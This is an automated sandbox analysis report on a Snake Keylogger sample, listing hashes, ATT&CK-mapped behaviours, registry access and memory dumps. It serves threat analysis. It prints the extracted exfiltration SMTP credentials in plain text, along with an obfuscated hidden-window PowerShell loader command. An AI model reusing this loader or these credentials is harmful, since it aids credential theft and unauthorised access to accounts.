snakekeylogger | 5fa3a2796eaf9563333a8da8feae53d42fc90d4ab3de1dbb1bb38d4c3923945c

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-10-2024 07:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Materien.exe
Size

752KB
MD5

da48313586a7ed35308c3d7b730be3a8
SHA1

3ccfbbce591a3f16cc620984d2be7929fd7c69a5
SHA256

802900953255394194cffac091a16c4edbee0cacb91ea43823ed2e36b5b4a3c4
SHA512

5fc0666e58ff30541c5205de42009ca9340308dd3c664b9b1e28ebaffdb7ee2ed24ad584b1de2157472ef2ce172dc84fee0521d6729c7e8af27573eeae49a186
SSDEEP

12288:jGHXvdN4G9MMe/OdNDqJ83eCOyGOs61IYZVAecgs9FMa1Mdq8jJa:juNNesNlLDGMIYO7MoOa

Score

10^/10

snakekeylogger collection discovery execution keylogger spyware stealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
smtp.securemail.pro
Port:
587
Username:
[email protected]
Password:
jrpM0Y5k
Email To:
[email protected]

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 2 IoCs

resource	yara_rule
behavioral2/memory/3352-133-0x0000000000470000-0x00000000016C4000-memory.dmp	family_snakekeylogger
behavioral2/memory/3352-135-0x0000000000470000-0x0000000000496000-memory.dmp	family_snakekeylogger

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4512	powershell.exe
1224	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
4836	responseriets.exe
3352	responseriets.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	responseriets.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	responseriets.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	responseriets.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	responseriets.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	responseriets.exe
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	responseriets.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
22	drive.google.com
23	drive.google.com
24	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
45	checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
3352	responseriets.exe
4836	responseriets.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4512	powershell.exe
1224	powershell.exe
3352	responseriets.exe
4836	responseriets.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\resources\0409\Grubstaking.bro	Materien.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Materien.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	responseriets.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	responseriets.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4512	powershell.exe
1224	powershell.exe
1224	powershell.exe
4512	powershell.exe
4512	powershell.exe
4512	powershell.exe
4512	powershell.exe
1224	powershell.exe
1224	powershell.exe
1224	powershell.exe
4512	powershell.exe
4512	powershell.exe
4512	powershell.exe
1224	powershell.exe
1224	powershell.exe
1224	powershell.exe
4512	powershell.exe
1224	powershell.exe
3352	responseriets.exe
4836	responseriets.exe
3352	responseriets.exe
4836	responseriets.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1224	powershell.exe
4512	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeIncreaseQuotaPrivilege	1224	powershell.exe
Token: SeSecurityPrivilege	1224	powershell.exe
Token: SeTakeOwnershipPrivilege	1224	powershell.exe
Token: SeLoadDriverPrivilege	1224	powershell.exe
Token: SeSystemProfilePrivilege	1224	powershell.exe
Token: SeSystemtimePrivilege	1224	powershell.exe
Token: SeProfSingleProcessPrivilege	1224	powershell.exe
Token: SeIncBasePriorityPrivilege	1224	powershell.exe
Token: SeCreatePagefilePrivilege	1224	powershell.exe
Token: SeBackupPrivilege	1224	powershell.exe
Token: SeRestorePrivilege	1224	powershell.exe
Token: SeShutdownPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeSystemEnvironmentPrivilege	1224	powershell.exe
Token: SeRemoteShutdownPrivilege	1224	powershell.exe
Token: SeUndockPrivilege	1224	powershell.exe
Token: SeManageVolumePrivilege	1224	powershell.exe
Token: 33	1224	powershell.exe
Token: 34	1224	powershell.exe
Token: 35	1224	powershell.exe
Token: 36	1224	powershell.exe
Token: SeIncreaseQuotaPrivilege	4512	powershell.exe
Token: SeSecurityPrivilege	4512	powershell.exe
Token: SeTakeOwnershipPrivilege	4512	powershell.exe
Token: SeLoadDriverPrivilege	4512	powershell.exe
Token: SeSystemProfilePrivilege	4512	powershell.exe
Token: SeSystemtimePrivilege	4512	powershell.exe
Token: SeProfSingleProcessPrivilege	4512	powershell.exe
Token: SeIncBasePriorityPrivilege	4512	powershell.exe
Token: SeCreatePagefilePrivilege	4512	powershell.exe
Token: SeBackupPrivilege	4512	powershell.exe
Token: SeRestorePrivilege	4512	powershell.exe
Token: SeShutdownPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeSystemEnvironmentPrivilege	4512	powershell.exe
Token: SeRemoteShutdownPrivilege	4512	powershell.exe
Token: SeUndockPrivilege	4512	powershell.exe
Token: SeManageVolumePrivilege	4512	powershell.exe
Token: 33	4512	powershell.exe
Token: 34	4512	powershell.exe
Token: 35	4512	powershell.exe
Token: 36	4512	powershell.exe
Token: SeDebugPrivilege	3352	responseriets.exe
Token: SeDebugPrivilege	4836	responseriets.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4760 wrote to memory of 4512	4760	Materien.exe	84
PID 4760 wrote to memory of 4512	4760	Materien.exe	84
PID 4760 wrote to memory of 4512	4760	Materien.exe	84
PID 4760 wrote to memory of 1224	4760	Materien.exe	86
PID 4760 wrote to memory of 1224	4760	Materien.exe	86
PID 4760 wrote to memory of 1224	4760	Materien.exe	86
PID 4512 wrote to memory of 3352	4512	powershell.exe	97
PID 4512 wrote to memory of 3352	4512	powershell.exe	97
PID 4512 wrote to memory of 3352	4512	powershell.exe	97
PID 1224 wrote to memory of 4836	1224	powershell.exe	98
PID 1224 wrote to memory of 4836	1224	powershell.exe	98
PID 1224 wrote to memory of 4836	1224	powershell.exe	98
PID 1224 wrote to memory of 4836	1224	powershell.exe	98
PID 4512 wrote to memory of 3352	4512	powershell.exe	97

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	responseriets.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	responseriets.exe

C:\Users\Admin\AppData\Local\Temp\Materien.exe
"C:\Users\Admin\AppData\Local\Temp\Materien.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4760
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Totemistic=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Tillgspensionen.Ask';$Skomagermestrene=$Totemistic.SubString(54750,3);.$Skomagermestrene($Totemistic)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Users\Admin\AppData\Local\Temp\responseriets.exe
    "C:\Users\Admin\AppData\Local\Temp\responseriets.exe"
    3⤵
    - Loads dropped DLL
    - Accesses Microsoft Outlook profiles
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3352
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Totemistic=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Tillgspensionen.Ask';$Skomagermestrene=$Totemistic.SubString(54750,3);.$Skomagermestrene($Totemistic)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1224
- - C:\Users\Admin\AppData\Local\Temp\responseriets.exe
    "C:\Users\Admin\AppData\Local\Temp\responseriets.exe"
    3⤵
    - Loads dropped DLL
    - Accesses Microsoft Outlook profiles
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:4836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
854B

MD5
e935bc5762068caf3e24a2683b1b8a88

SHA1
82b70eb774c0756837fe8d7acbfeec05ecbf5463

SHA256
a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

SHA512
bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
5c4d9413f56c30dfd546b7d0623f8dc9

SHA1
179b86ec8a371593a928d35db04da25104bd6ca4

SHA256
1f0b60c23cc18187d120c672dbd7d193fde9a4cda1848e237e68c1650176d967

SHA512
84a608e128b7b8720199e43b8dcb2e07f4f7cce6294dc531e208f0e1e54746ae5026c3745d7fc96718e3e4f41553a40d7b214b071291b6b3d3c3f0ef987138a8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD

Filesize
471B

MD5
30b8219664afbb8d78a27969e8755ca1

SHA1
31e8ce9f55ef615280b21beb3eb5fb2f823f41df

SHA256
91324c7e829db20de8d55d5a425c5ac46c5551023221d4e36e2b61218f30815a

SHA512
5eb0d0d99460e54f69581cf35c20841efdabe17255d12b03e9f460dff723e8f2980b166fa9b71b6042034aa6b6fd2d7a70536dd1176bb13fb5981bcae14d4f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4

Filesize
472B

MD5
a1f013adb9ec5f40524a6635540e628f

SHA1
76ed661478849d5bbe5c847d1e05f81becdd67dd

SHA256
450676438e2163fea2e341a9756355502bc35acc46efc68264578dfa76b30ab2

SHA512
9426895082573c3f5cf12b20b27f1733c64e9fe69757394e49f7491509a0b397c5bdf07bd0ae6ac8821640c7759ebe17725a8f507eb878fff7750c3c0b557c27

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
170B

MD5
2bff187886b7afe50ebf80c5bc410060

SHA1
dd9ffb93099eb8278bcaa7518ce83d5325eefe73

SHA256
b27f6d893b5dba5690a0e383261e1c5609f3414120f08df5230bb780fb1ac7b4

SHA512
e1930819cc909c19aaf0353c66a020acb79b75ed1a3f7abf3bbff14c34c5d4f1fea6ad134cc2885d95fca8c815730e5ac5dc93e3da7ee324aec93cc7d8ce4b08

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
c371bf14b1675378ef0e0a75f330a928

SHA1
8bc9ec749b5bce0fc84ba5ba1a7894a144f2a838

SHA256
7e6d773bf9ac39eb20ff54052a298a802cff914ba0d05a60ccabec9731260627

SHA512
5ae51e62f6a3cd0756f83e1b8714835bfa878f1c7c4562f00941607d2cf48aae9fa0e95ccf1cf3152eff7e8fe4ecfd35b7acf057c8ec3f8335ded72d739aa1ab

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD

Filesize
402B

MD5
b02bc66460a980c2666e5b6eafae014f

SHA1
3d73501f4e7b697de34ebb6a2334eec041752c43

SHA256
3ea8abed7b67d5ed74b0cddb7043c57b9deb0b05ebfd6bf671f525eb9c74f54e

SHA512
a645a4239749b1fe613dee94482fee4385a73e4766e5828fec44f65c43688042f3d0b54c3aacd90397bf978180b7617cbfba6f4dfbdc65c5d2d2e817afa09ded

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4

Filesize
398B

MD5
8ef8eef699f1f9faa6d02cc25e6ce4d8

SHA1
44903c480df841a12ac57c559f0c154d1316d090

SHA256
e5b1451c59d3328e5b296d568ee7cc060c371a000f2460b9eabb5570406363d0

SHA512
d1f035740e1c5ee9a70721f054608c2403c6f4c451bd96599316ee511d834167bab50222ff04f7fd8fcd931d1e8d58b9a5c7084cbbbfe06fdaa31a572780e0b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
01404e51f6442f60e478c306b1e6e52e

SHA1
37f234ccf5611b8309023410ceb9e76ad81f5678

SHA256
d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b

SHA512
94a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_paqdgity.wkc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\responseriets.exe

Filesize
752KB

MD5
da48313586a7ed35308c3d7b730be3a8

SHA1
3ccfbbce591a3f16cc620984d2be7929fd7c69a5

SHA256
802900953255394194cffac091a16c4edbee0cacb91ea43823ed2e36b5b4a3c4

SHA512
5fc0666e58ff30541c5205de42009ca9340308dd3c664b9b1e28ebaffdb7ee2ed24ad584b1de2157472ef2ce172dc84fee0521d6729c7e8af27573eeae49a186

Download Submit
C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Disputpkr.Obj

Filesize
314KB

MD5
b3a6ae1fbef18fc7ed2d6c9a2349441b

SHA1
db868dce61b49f96cec7b4dc9356bf8e86262bb1

SHA256
da736ce450c5e470f291b965f43994010adf164f5539d659be3737ec271d9197

SHA512
b9db47aa9de54e2e4abafab6adda04f46e0962f4ac34eb01a32674e9dc0f6c54d9db9b029215e7c9d9bfe729fdb5f96657482bbc19b52a263e76ac8a4446a7d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Tillgspensionen.Ask

Filesize
53KB

MD5
1e72916a0e82da66cf7753db11b602a2

SHA1
322d0c1a058a5c4ba50f534137c45462dd8b989d

SHA256
8a7aca1e042680f82f1703da26587d5058e55cdc50a9da8bc7bd226d1a6748d4

SHA512
b32c7d41172e7df012277acb4f8662e1d5949db80d9a35a68433eaee8d740b46a0d3a068d6609140e86e846b0ac436e21e18ba7d85b17db3214cc7ef833af203

Download Submit
memory/1224-99-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-12-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-8-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-7-0x0000000004CB0000-0x0000000004CE6000-memory.dmp

Filesize
216KB

Download
memory/1224-11-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-10-0x0000000005320000-0x0000000005948000-memory.dmp

Filesize
6.2MB

Download
memory/1224-36-0x0000000006210000-0x000000000622E000-memory.dmp

Filesize
120KB

Download
memory/1224-37-0x0000000006240000-0x000000000628C000-memory.dmp

Filesize
304KB

Download
memory/1224-13-0x0000000005140000-0x0000000005162000-memory.dmp

Filesize
136KB

Download
memory/1224-90-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-89-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-85-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-83-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-65-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-59-0x00000000700D0000-0x0000000070424000-memory.dmp

Filesize
3.3MB

Download
memory/1224-57-0x000000006F950000-0x000000006F99C000-memory.dmp

Filesize
304KB

Download
memory/1224-71-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-70-0x00000000076B0000-0x0000000007753000-memory.dmp

Filesize
652KB

Download
memory/1224-80-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/1224-73-0x00000000077E0000-0x00000000077EA000-memory.dmp

Filesize
40KB

Download
memory/1224-74-0x0000000007960000-0x000000000798A000-memory.dmp

Filesize
168KB

Download
memory/1224-75-0x0000000007990000-0x00000000079B4000-memory.dmp

Filesize
144KB

Download
memory/1224-22-0x0000000005C30000-0x0000000005F84000-memory.dmp

Filesize
3.3MB

Download
memory/3352-133-0x0000000000470000-0x00000000016C4000-memory.dmp

Filesize
18.3MB

Download
memory/3352-143-0x0000000021F20000-0x0000000021F2A000-memory.dmp

Filesize
40KB

Download
memory/3352-142-0x0000000021E40000-0x0000000021ED2000-memory.dmp

Filesize
584KB

Download
memory/3352-141-0x0000000021C70000-0x0000000021E32000-memory.dmp

Filesize
1.8MB

Download
memory/3352-140-0x0000000021C20000-0x0000000021C70000-memory.dmp

Filesize
320KB

Download
memory/3352-136-0x00000000210F0000-0x000000002118C000-memory.dmp

Filesize
624KB

Download
memory/3352-135-0x0000000000470000-0x0000000000496000-memory.dmp

Filesize
152KB

Download
memory/4512-100-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/4512-41-0x0000000007CA0000-0x0000000008244000-memory.dmp

Filesize
5.6MB

Download
memory/4512-44-0x0000000007A90000-0x0000000007AC2000-memory.dmp

Filesize
200KB

Download
memory/4512-45-0x000000006F950000-0x000000006F99C000-memory.dmp

Filesize
304KB

Download
memory/4512-91-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/4512-15-0x0000000005E80000-0x0000000005EE6000-memory.dmp

Filesize
408KB

Download
memory/4512-6-0x00000000734CE000-0x00000000734CF000-memory.dmp

Filesize
4KB

Download
memory/4512-79-0x00000000734CE000-0x00000000734CF000-memory.dmp

Filesize
4KB

Download
memory/4512-16-0x0000000005EF0000-0x0000000005F56000-memory.dmp

Filesize
408KB

Download
memory/4512-46-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/4512-43-0x00000000088D0000-0x0000000008F4A000-memory.dmp

Filesize
6.5MB

Download
memory/4512-88-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/4512-38-0x0000000007610000-0x00000000076A6000-memory.dmp

Filesize
600KB

Download
memory/4512-9-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/4512-40-0x0000000007570000-0x0000000007592000-memory.dmp

Filesize
136KB

Download
memory/4512-39-0x0000000006B70000-0x0000000006B8A000-memory.dmp

Filesize
104KB

Download
memory/4512-86-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/4512-47-0x00000000700D0000-0x0000000070424000-memory.dmp

Filesize
3.3MB

Download
memory/4512-84-0x0000000008F50000-0x000000000A238000-memory.dmp

Filesize
18.9MB

Download
memory/4512-58-0x0000000007A70000-0x0000000007A8E000-memory.dmp

Filesize
120KB

Download
memory/4512-14-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/4512-81-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download
memory/4512-72-0x00000000734C0000-0x0000000073C70000-memory.dmp

Filesize
7.7MB

Download